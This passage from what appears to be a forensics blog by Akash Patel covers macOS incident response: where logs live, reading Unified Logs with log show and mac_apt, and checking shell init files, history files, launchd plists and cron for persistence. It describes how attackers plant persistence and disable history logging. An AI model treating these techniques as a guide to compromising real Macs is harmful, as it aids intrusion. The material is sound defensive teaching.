framework, renowned for cataloging adversary tactics and techniques, has been expanded to include cloud-specific threats . While current versions focus on major cloud platforms like Microsoft Azure and Google Cloud, they also include techniques applicable to IaaS and SaaS broadly. This makes it a valuable resource for proactive defense planning in cloud environments. Regularly reviewing the techniques in the framework can help you design detections that fit your organization’s cloud architecture. 
By integrating the ATT&CK framework into your cloud incident response strategy, you’ll be better equipped to recognize suspicious behavior and quickly respond to emerging threats. Conclusion: Embracing Cloud Forensics in an Evolving Threat Landscape Cloud forensics presents a unique set of challenges, but with the right knowledge and tools, your organization can respond effectively to incidents in cloud environments. Remember, it’s all about preparation. Invest in adequate logging, establish incident response protocols, and familiarize your team with the MITRE ATT&CK framework. By doing so, you’ll ensure that you’re ready to tackle threats in the cloud with the same rigor and responsiveness as on-premises investigations. Akash Patel

  • macOS Incident Response: Tactics, Log Analysis, and Forensic Tools

    macOS logging is built on a foundation similar to traditional Linux/Unix  systems, thanks to its BSD ancestry . While macOS generates a significant number of logs, the structure and format of these logs have evolved over time ---------------------------------------------------------------------------------------------- Overview of macOS Logging Most macOS logs are stored in plain text   within the /var/log  directory (also found as /private/var/log ). These logs follow the traditional Unix Log Format : MMM DD HH:MM:SS HOST Service: Message One major challenge : log entries don't include the year  or time zone , so when reviewing events near the turn of the year, it’s important to be cautious. Logs are rotated based on size or age, with old logs typically compressed using gzip  or bzip2 . Key Difference from Linux/Unix Logging macOS uses two primary binary log formats: Apple System Log (ASL) : Introduced in macOS X Leopard , ASL stored syslog data in a binary format . While deprecated, it’s still important for backward compatibility. Apple Unified Log (AUL) : Starting with macOS Sierra (10.12) , AUL became the standard for most logging . Apps and processes now use AUL, but some data may still be logged via ASL. ---------------------------------------------------------------------------------------------- Common Log Locations Investigators should know where key log files are stored: /var/log : Primary system logs. /var/db/diagnostics : System diagnostic logs. /Library/logs : System and application logs. ~/Library/Logs : User-specific logs. /Library/Application Support/(App name) : Application logs. /Applications : Logs for applications installed on the system. ---------------------------------------------------------------------------------------------- Important Plain Text Logs Some of the most useful plain text logs for enterprise incident response include: /var/log/system.log : General system diagnostics. /var/log/DiskUtility.log : Disk mounting and management events. /var/log/fsck_apfs.log : Filesystem-related events. /var/log/wifi.log : Wi-Fi connections and known hotspots. /var/log/appfirewall.log : Network events related to the firewall. Note : Starting with macOS Mojave , many of these logs have transitioned to Apple Unified Logs  (AUL). On upgraded systems, you might still find them, but they are no longer actively used for logging in newer macOS versions. ---------------------------------------------------------------------------------------------- Binary Logs in macOS macOS has shifted toward binary logging formats for better performance and data integrity. Investigators should be familiar with two main types: 1. Apple System Logs (ASL) Location : /var/log/asl/*.asl View : Use the syslog  command or Console app  during live response. ASL  contains diagnostic and system management data , including startup/shutdown events and some process telemetry. 2. Apple Unified Logs (AUL) Location : /var/db/diagnostics/Persist /var/db/diagnostics/timesync /var/db/uuidtext/ File Type : .tracev3 AUL  is the default logging format since macOS Sierra (10.12) . These logs cover a wide range of activities, from user authentication  to sudo usage , and are critical for forensic analysis. How to View AUL: View in live response : Use the log  command or the Console app . File parsing : These logs are challenging to read manually. It’s best to use specialized tools designed to extract and analyze AUL logs. 
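For quick live triage of the Apple Unified Logs, the built-in log command supports time windows and predicate filters. The commands below are a minimal sketch; the time windows and the process name in the predicate are only illustrative, so adapt them to the activity you are investigating.

# Show the last hour of unified log entries on a live system
log show --last 1h --info

# Narrow the output to a single process, for example sudo usage
log show --last 24h --predicate 'process == "sudo"' --info

# Collect a portable archive for offline review on another Mac (needs admin rights)
log collect --last 1d --output /tmp/triage.logarchive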
---------------------------------------------------------------------------------------------- Limitations of macOS Logging Default Logging May Be Insufficient : Most macOS systems don’t have enhanced logging enabled (like auditd ), which provides more detailed logs. This can result in gaps when conducting enterprise-level incident response. Log Modification : Users with root or sufficient privileges can modify or delete logs , meaning attackers may tamper with evidence. Binary Format Challenges : Analyzing ASL and AUL logs on non-macOS systems can be difficult. The best approach is to use a macOS device for live response or log analysis, as using other platforms may result in a loss of data quality. ---------------------------------------------------------------------------------------------- Live Log Analysis in macOS 1. Using the Last Command Just like in Linux, the last command shows the most recent logins on the system, giving investigators a quick overview of user access. 2. Reading ASL Logs with Syslog The syslog command allows investigators to parse Apple System Log (ASL) files in binary format: syslog -f (filename).asl While it can reveal key system events, it’s not always easy to parse visually. 3. Live Analysis with the Console App For a more user-friendly experience, macOS provides the Console app, a GUI tool that allows centralized access to both Apple System Logs (ASL) and the more modern Apple Unified Logs (AUL). It’s an ideal tool for visual log analysis, but keep in mind, you can’t process Console output with command-line tools or scripts. ---------------------------------------------------------------------------------------------- Binary Log Analysis on Other Platforms When you can’t analyze logs on a macOS machine, especially during forensic analysis on Windows or Linux, mac_apt is a powerful, cross-platform solution. mac_apt: macOS Artifact Parsing Tool Developed by Yogesh Khatri, mac_apt is an open-source tool designed to parse macOS and iOS artifacts, including Apple Unified Logs (AUL). https://github.com/ydkhatri/mac_apt Key Features : Reads from various sources like raw disk images, E01 files, VMDKs, mounted disks, or specific folders. Extracts artifacts such as user lists, login data, shell history, and Unified Logs. Outputs data in CSV, TSV, or SQLite formats. Challenges with mac_apt : TSV Parsing : The default TSV output is in UTF-16 Little Endian, which can be tricky to process with command-line tools. However, it works well in spreadsheet apps. Large File Sizes : Log files can be huge, and mac_apt generates additional copies for evidence, which can take up significant disk space. For example, analyzing a 40GB disk image could produce a 13GB UnifiedLogs.db file and 15GB of exported evidence. Speed : Some plugins can be slow to run. Using the FAST option avoids the slowest ones but can still take 10-15 minutes to complete. A full extraction with plugins like SPOTLIGHT and UNIFIEDLOGS can take over an hour.
---------------------------------------------------------------------------------------------- How to Use mac_apt The command-line structure of mac_apt is straightforward, and you can select specific plugins based on the data you need: python /opt/mac_apt/mac_apt.py -o /output_folder --csv -d E01 /diskimage.E01 PLUGIN_NAME For example, to investigate user activity: python /opt/mac_apt/mac_apt.py -o /analysis --csv -d E01 /diskimage.E01 UTMPX USERS TERMSESSIONS This will extract user information, login data, and shell history files into TSV files. Useful mac_apt Plugins for DFIR : ALL : Runs every plugin (slow, only use if necessary). FAST : Runs plugins without UNIFIEDLOGS, SPOTLIGHT, and IDEVICEBACKUPS, speeding up the process. SUDOLASTRUN : Extracts the last time sudo was run, useful for privilege escalation detection. TERMSESSIONS : Reads terminal history (Bash/Zsh). UNIFIEDLOGS : Reads .tracev3 files from Apple Unified Logs. UTMPX : Reads login data. ---------------------------------------------------------------------------------------------- Conclusion: This article has tried to simplify the complex task of macOS log analysis during incident response, providing investigators with practical tools and strategies for both live and binary log extraction. By using the right tools and understanding key log formats, you can efficiently gather the information you need to support forensic investigations. Akash Patel

  • Investigating macOS Persistence: Key Artifacts, Launch Daemons, and Forensic Strategies

    Let’s explore the common file system artifacts investigators need to check during incident response (IR). ---------------------------------------------------------------------------------------------- 1. Commonly Abused Files for Persistence Attackers often target shell initialization files to maintain persistence by modifying the user’s environment, triggering scripts, or executing binaries. Zsh Shell Artifacts (macOS default shell since Catalina) Global Zsh Files: /etc/zprofile : Alters the shell environment for all users, setting variables like $PATH. Attackers may modify it to run malicious scripts upon login. /etc/zshrc : Loads configuration settings for all users. Since macOS Big Sur, this file gets rebuilt with system updates. /etc/zsh/zlogin : Runs after zshrc during login and often used to start GUI tools. User-Specific Zsh Files: Attackers may also modify individual user shell files located in the user’s home directory (~): ~/.zshenv (optional) ~/.zprofile ~/.zshrc ~/.zlogin ~/.zlogout (optional) User History ~/.zsh_history ~/.zsh_sessions (directory) These files are loaded in sequence during login, giving attackers multiple opportunities to run malicious code. Note: During IR collection it is advised to review all of these files (including ~/.zshenv and ~/.zlogout if they are present) for signs of attacker activity. ---------------------------------------------------------------------------------------------- 2. User History Files Tracking a user’s shell activity can provide valuable insights during an investigation. The .zsh_history file logs the commands a user entered into the shell. By default, this file stores the last 1,000 commands, but the number can be configured via SAVEHIST and HISTSIZE in /etc/zshrc. Important Note : The history file is only written to disk when the session ends. During live IR, make sure active sessions are terminated to capture the latest data. Potential Manipulation : Attackers may selectively delete entries or set SAVEHIST and HISTSIZE to zero, preventing commands from being logged. Another place to check is the .zsh_sessions directory. This folder stores session and temporary history files, which may contain overlooked data. ---------------------------------------------------------------------------------------------- 3. Bash Equivalents For systems where Bash is in use (either as an alternative shell or legacy setup), investigators should review the following files, which serve the same purpose as their Zsh counterparts: ~/.bash_history ~/.bash_profile ~/.bash_login ~/.profile ~/.bashrc ~/.bash_logout Attackers can modify these files to achieve persistence or hide their activity. ---------------------------------------------------------------------------------------------- 4. Installed Shells It’s not uncommon for users to install other shells. To verify which shells are installed, check the /etc folder, and look at the user’s home directory for history files. If multiple shells have been installed, you may find artifacts from more than one shell.
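On a live system or a mounted image, a few quick commands cover sections 2 to 4 above: enumerating which shells are present and pulling every history file for review. This is a minimal sketch; the username is a placeholder, so substitute the accounts you are actually investigating.

# List the login shells registered on the system
cat /etc/shells

# Look for history files for every shell a user may have used (username is a placeholder)
ls -la /Users/jdoe/ | grep -i hist
cat /Users/jdoe/.zsh_history /Users/jdoe/.bash_history 2>/dev/null

# Session files that may hold history fragments missed above
ls -la /Users/jdoe/.zsh_sessions/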
---------------------------------------------------------------------------------------------- 5. Key File Artifacts for User Preferences macOS stores extensive configuration data in each user’s ~/Library/Preferences folder. Some of these files are particularly useful during an investigation. Browser Downloads : Quarantine Information : Found in the com.apple.LaunchServices.QuarantineEventsV* SQLite database, this file logs information about executable files downloaded from the internet, including URLs, email addresses, and subject lines. Recently Accessed Files : macOS Mojave and earlier : com.apple.RecentItems.plist. macOS Big Sur and later : com.apple.shared.plist Finder Preferences : The com.apple.finder.plist file contains details on how the Finder app is configured, including information on mounted volumes. Keychain Preferences : The com.apple.keychainaccess.plist file logs keychain preferences and the last accessed keychain, which can provide clues about encrypted data access. Investigation Note : Be aware that attackers can modify or delete these files, and they may not always be present. ---------------------------------------------------------------------------------------------- macOS Common Persistence Mechanisms Attackers use various strategies to maintain persistence on macOS systems, often exploiting system startup files or scheduled tasks. 1. Startup Files Attackers frequently modify system or user initialization files to add malicious scripts or commands. These files are read when the system or user session starts, making them a common target. 2. Launch Daemon (launchd) The launchd daemon controls services and processes triggered during system boot or user login. While it’s used by legitimate applications, attackers can exploit it by registering malicious property list (.plist) files or modifying existing ones to point to malicious executables. Investigating launchd on a Live System: You can use the launchctl command to list all the active jobs: launchctl list This command will show: PID : Process ID of running jobs. Status : Exit status or the signal that terminated the job (e.g., -9 for a SIGKILL). Label : Name of the task, sourced from the .plist file that created the job. Investigating launchd on Disk Images: The launchd process is owned by root and normally runs as PID 1 on a system. It is the only process which can’t be killed while the system is running. This allows it to create jobs that can run as a range of user accounts. Jobs are created by property list (plist) files in specific locations, which point to executable files. The launchd process reads the plist and launches the file with any arguments or instructions as set in the plist. To analyze launchd in a system image or offline triage: Privileged Jobs : Check these folders for startup tasks that run as root or other users: /Library/LaunchAgents : Per-user agents for all logged-in users, installed by admins. /Library/LaunchDaemons : System-wide daemons, installed by admins. /System/Library/LaunchAgents : Apple-provided agents for user logins. /System/Library/LaunchDaemons : Apple-provided system-wide daemons. User Jobs : Jobs specific to individual users are stored in: /Users/(username)/Library/LaunchAgents 3. Cron Tasks Similar to Linux systems, cron manages scheduled tasks in macOS. Attackers may create cron jobs that trigger the execution of malicious scripts at regular intervals.
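The workflow below walks through reviewing these launchd locations methodically. As a quick illustration of what that looks like in practice, here are a few commands for listing recently changed jobs and inspecting a candidate plist; the plist and executable paths used here are purely hypothetical.

# List launchd job files, most recently modified first
ls -lat /Library/LaunchDaemons /Library/LaunchAgents /Users/*/Library/LaunchAgents

# Dump a suspicious plist in readable form and review its Program/ProgramArguments keys
plutil -p /Library/LaunchDaemons/com.example.updater.plist

# Hash the executable the plist points to, for reputation checks (path is hypothetical)
shasum -a 256 "/Library/Application Support/Updater/updater"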
---------------------------------------------------------------------------------------------- Workflow for Analyzing Launchd Files When investigating launchd persistence, use this methodical approach: Check for Unusual Filenames : Look for spelling errors, odd filenames, or files that imitate legitimate names. Start in the /Library/LaunchAgents and /Library/LaunchDaemons folders. Sort by Modification Date : If you know when the incident occurred, sort the .plist files by modification date to find any changes made around the time of the attack. Analyze File Contents : Check the Program and ProgramArguments keys in each .plist file. Investigate any executables they point to. Validate Executables : Confirm whether the executables are legitimate by checking their file hashes or running basic forensic analysis, such as using the strings command or full reverse engineering. ---------------------------------------------------------------------------------------------- Final Thoughts When investigating a macOS system, checking these file system artifacts is crucial. From shell initialization files that may be altered for persistence to history files that track user activity, these files provide a window into the state of the system. By examining user preferences, quarantine data, and persistence mechanisms, you can further uncover potential signs of compromise or abnormal behavior. Akash Patel
